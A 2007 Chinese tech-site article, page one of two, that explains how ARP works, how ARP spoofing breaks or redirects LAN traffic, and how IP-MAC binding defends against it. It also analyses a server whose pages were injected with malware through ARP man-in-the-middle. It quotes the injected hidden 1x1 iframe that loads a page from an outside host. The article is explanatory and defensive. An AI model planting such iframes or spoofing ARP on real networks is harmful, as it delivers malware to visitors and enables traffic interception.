文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 木马病毒网站被挂马 ARP地址欺骗解决之道
精品推荐
特别推荐
·趋势:新反病毒技术亟待成熟
·病毒反抗杀毒软件主要手段
·文件关联型木马的特殊化查杀
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
·识别非法进程及手工杀毒技巧
·清除系统隐藏病毒文件全攻略
·轻松找到恶意网站中藏的病毒
·一个防止U盘病毒的小技巧
·AUTO病毒致杀软失效并下载病毒
·禁止让瑞星2008随机启动的绝招
热点TOP10
·QQ聊天记录偷窥和QQ视频欺骗
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
·俄罗斯杀毒软件大蜘蛛登陆中国
·不再怕电脑病毒 电脑中毒后的6招处理方法
·卡巴斯基6.0下载卡巴斯基6.0key激活码
·警惕高危木马病毒 随意下载病毒窃密码
·一个防止U盘病毒的小技巧
·卡巴斯基2009 Beta版 初步试用感受
·不是这么简单 揭秘网友十大杀毒误区
·江民杀毒软件 KV2008 正式版免费下载

网站被挂马 ARP地址欺骗解决之道

日期:2007年10月25日 作者: 查看:[大字体 中字体 小字体]


   什么是ARP

   地址解析协议(Address Resolution Protocol,ARP)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDIIP网络中使用。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。

   假设:
   计算机A的IP为192.168.1.1,MAC地址为00-11-22-33-44-01;
   计算机B的IP为192.168.1.2,MAC地址为00-11-22-33-44-02;

   ARP工作原理如下:

   在TCP/IP协议中,A给B发送IP包,在包头中需要填写B的IP为目标地址,但这个IP包在以太网上传输的时候,还需要进行一次以太包的封装,在这个以太包中,目标地址就是B的MAC地址.

   计算机A是如何得知B的MAC地址的呢?解决问题的关键就在于ARP协议。

   在A不知道B的MAC地址的情况下,A就广播一个ARP请求包,请求包中填有B的IP(192.168.1.2),以太网中的所有计算机都会接收这个请求,而正常的情况下只有B会给出ARP应答包,包中就填充上了B的MAC地址,并回复给A。

   A得到ARP应答后,将B的MAC地址放入本机缓存,便于下次使用。

   本机MAC缓存是有生存期的,生存期结束后,将再次重复上面的过程。

   ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。因此,当局域网中的某台机器B向A发送一个自己伪造的ARP应答,而如果这个应答是B冒充C伪造来的,即IP地址为C的IP,而MAC地址是伪造的,则当A接收到B伪造的ARP应答后,就会更新本地的ARP缓存,这样在A看来C的IP地址没有变,而它的MAC地址已经不是原来那个了。由于局域网的网络流通不是根据IP地址进行,而是按照MAC地址进行传输。所以,那个伪造出来的MAC地址在A上被改变成一个不存在的MAC地址,这样就会造成网络不通,导致A不能Ping通C!这就是一个简单的ARP欺骗。

   应用

   在网络执法官中,要想限制某台机器上网,只要点击"网卡"菜单中的"权限",选择指定的网卡号或在用户列表中点击该网卡所在行,从右键菜单中选择"权限",在弹出的对话框中即可限制该用户的权限。对于未登记网卡,可以这样限定其上线:只要设定好所有已知用户(登记)后,将网卡的默认权限改为禁止上线即可阻止所有未知的网卡上线。使用这两个功能就可限制用户上网。其原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC地址,这样就可以禁止其上网。

   防御
   ARP欺骗可以导致目标计算机与网关通信失败

   更可怕的是会导致通信重定向,所有的数据都会通过攻击者的机器,因此存在极大的安全隐患。

   基与PC到PC的IP-MAC双向绑定可以解决ARP欺骗

   但是对于不支持IP-MAC双向绑定的设备

   就需要用可以绑定端口-MAC的交换来预防ARP欺骗

   另外,Windows 2KSP4 XPSP1 的Arp-S绑定是无效的

   需要升级到 2KSP5 或 XPSP2


   网页挂马原理

   不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入:

   <IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>;,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况.

   首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是 title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网站的问题了.打开同服务器的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题.

   那么剩下的要么是IIS自己出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的).

   目的:通过arp欺骗来直接挂马

   优点:可以直接通过arp欺骗来挂马.

   通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码

[1] [2] 下一页 




上一篇:Google Adsenser原窗口打开 被强奸的用户体验

下一篇:诊断和分析网站 提高搜索引擎的收录和排名

相关文章:
·借台电脑办网站—访深圳外来工站长姚永卫
·网站赚钱的四个技巧
·QQ聊天记录偷窥和QQ视频欺骗
·解决与HTTP 500 – 内部服务器错误错误信息有关的问题
·网站优化需要重要注意的几点事项
·不用重装XP系统就可以解决全部故障
·笔记本电脑无线上网解决方案大比拼
·XP系统运行慢?小编自用7招解决
·做人之道和做事之道
·Firefox 使用常见问题和解决方法
相关软件:
·自己动手建立企业网站
·自己动手建设个人网站
·公司企业网站管理系统模板功能强大版
·闪魂——Flash网站建设实录
·破解收费网站 的经典教程
·400套超酷网站模板
·各大MP3搜索网站前十名下载曲目
·分类信息网站模板免费版源码
·影片地址嗅探器绿色版
·金四维企业宣传网站系统

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot